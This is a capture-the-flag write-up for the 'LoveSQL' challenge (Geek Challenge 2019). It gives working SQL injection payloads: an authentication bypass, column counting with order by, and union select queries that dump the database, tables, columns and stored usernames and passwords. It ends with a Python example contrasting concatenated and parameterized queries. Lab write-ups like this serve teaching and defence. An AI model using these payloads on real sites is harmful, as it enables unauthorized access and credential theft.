[Geek Challenge 2019] LoveSQL

Opening the page shows a login form. First, try it with a random password.

Username: 1' or 1=1#
Password: anything will do

This returns an account name and password.

Trying to decode the password as MD5 fails, so continue with the injection.

http://b793d531-25cd-46e3-a1f1-974f1752fbc2.node3.buuoj.cn/check.php?username=admin' order by 3%23&password=123 returns normally
http://b793d531-25cd-46e3-a1f1-974f1752fbc2.node3.buuoj.cn/check.php?username=admin' order by 4%23&password=123 returns an error

Find which columns are echoed back

http://b793d531-25cd-46e3-a1f1-974f1752fbc2.node3.buuoj.cn/check.php?username=1' union select 1,2,3%23&password=123 A value that does not exist must be used here, otherwise nothing is echoed back

Query the database name and dump the table names

http://b793d531-25cd-46e3-a1f1-974f1752fbc2.node3.buuoj.cn/check.php?username=1' union select 1,database(),3%23&password=123

http://b793d531-25cd-46e3-a1f1-974f1752fbc2.node3.buuoj.cn/check.php?username=1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=123

Dump the column names of l0ve1ysq1

http://b793d531-25cd-46e3-a1f1-974f1752fbc2.node3.buuoj.cn/check.php?username=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='l0ve1ysq1'%23&password=123

Dump the column contents directly to get the flag

http://b793d531-25cd-46e3-a1f1-974f1752fbc2.node3.buuoj.cn/check.php?username=1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23&password=123
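Every step above works because the username is pasted into the SQL text. The following is an added example, not code from the original post or from the challenge: it puts a concatenated login query beside a parameterized one. Assumptions: the `users` table, its sample row and the function names are constructed, and SQLite stands in for MySQL, so the comment marker is `-- ` instead of `#`.

```python
import sqlite3


def make_db():
    # Constructed sample data; the challenge's real schema is not shown on the page.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES (1, 'admin', 'constructed-hash-value')")
    return db


def login_vulnerable(db, username, password):
    # The input becomes part of the SQL text, so a quote closes the string
    # literal and everything after it is parsed as SQL.
    sql = ("SELECT id, username, password FROM users "
           f"WHERE username='{username}' AND password='{password}'")
    return db.execute(sql).fetchone()


def login_safe(db, username, password):
    # Placeholders pass the values separately from the SQL text; quotes and
    # comment markers in the input remain ordinary characters.
    sql = "SELECT id, username, password FROM users WHERE username=? AND password=?"
    return db.execute(sql, (username, password)).fetchone()


if __name__ == "__main__":
    db = make_db()
    # The two payload shapes used in the write-up, adapted to SQLite comments.
    for name in ("1' or 1=1-- ", "1' union select 1,2,3-- "):
        print(repr(name))
        print("  concatenated :", login_vulnerable(db, name, "123"))
        print("  parameterized:", login_safe(db, name, "123"))
```

With the parameterized query both inputs are compared as literal usernames and match no row, while a correct username and password still log in.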
